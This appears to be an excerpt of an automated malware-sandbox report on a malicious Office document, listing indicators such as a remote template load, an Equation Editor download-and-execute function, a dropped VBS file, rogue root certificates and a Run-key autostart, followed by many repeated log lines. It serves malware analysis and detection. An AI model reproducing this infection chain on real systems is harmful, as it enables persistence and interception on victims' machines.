Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: \Device\RdpDr\;:1\pop.tg\DavWWWRoot Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: \Device\RdpDr\;:1\pop.tg\DavWWWRoot Jump to behavior
Command shell drops VBS files
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\ProgramData\sabelianos.vbs
Installs new ROOT certificates
Source: C:\Windows\SysWOW64\wscript.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob Jump to behavior
Office drops RTF file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File dump: beautifulroseipictureiseenitsshowingasabeautifulflowerwhichcomingfromtheworldanditsshowinghowbeautiful___sheiswhenthatroseonhairbeautiful[1].doc.0.dr Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File dump: 49740FD3.doc.4.dr Jump to dropped file
Office viewer loads remote template
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Section loaded: netapi32.dll and davhlpr.dll loaded Jump to behavior
Contains functionality to download and launch executables
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 9_2_036005F9 URLDownloadToFileW,ShellExecuteW,ExitProcess, 9_2_036005F9

Boot Survival
barindex
Creates autostart registry keys with suspicious values (likely registry only malware)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Path C:\ProgramData\sabelianos.vbs Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 28_2_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle, 28_2_0041AA4A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Path Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Path Jump to behavior
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 28_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress, 28_2_0041CB50
Stores large binary data to the registry
Source: C:\Windows\SysWOW64\wscript.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
